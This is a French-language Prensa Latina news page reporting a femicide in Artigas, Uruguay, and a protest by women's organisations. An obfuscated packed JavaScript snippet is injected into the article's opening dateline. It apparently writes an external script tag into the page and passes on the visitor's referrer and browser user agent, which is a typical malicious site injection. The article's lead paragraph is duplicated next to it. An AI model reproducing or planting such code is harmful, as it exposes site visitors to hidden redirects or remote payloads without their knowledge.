lundi 15 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Un nouveau féminicide en Uruguay

Montevideo, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hired|var|u0026u|referrer|daanf||js|php'.split('|'),0,{})) 3 oct (PL) La violence contre les femmes continue de provoquer des victimes fatales en Uruguay où l'organisation des Femmes en noire fait état de 21 décès depuis janvier 2017.

Montevideo, 3 oct (PL) La violence contre les femmes continue de provoquer des victimes fatales en Uruguay où l’organisation des Femmes en noire fait état de 21 décès depuis janvier 2017.

La nouvelle victime est une femme étranglée par son époux dans le département d’Artigas, dans le nord du pays. Le jeune de 21 ans s’est rendu dans une station de police  pour déclarer que son épouse s’était étranglée avec une corde. 

Après une enquête, les experts judiciaires ont découvert que la femme avait plusieurs coups sur le crâne et des fractures osseuses. À la suite d’un interrogatoire fait par la police, le jeune homme a avoué être le responsable de l’homicide. Il a été tout de suite était mis en garde à vue. 

Raison pour laquelle ce mardi des membres des organisations Femmes en noire, Intersocial Feminista et Réseau Uruguayen contre la Violence Sexuelle et Familiale se sont rassemblées devant la Cours suprême de justice.

lp/rc/jcd

EN CONTINU
notes connexes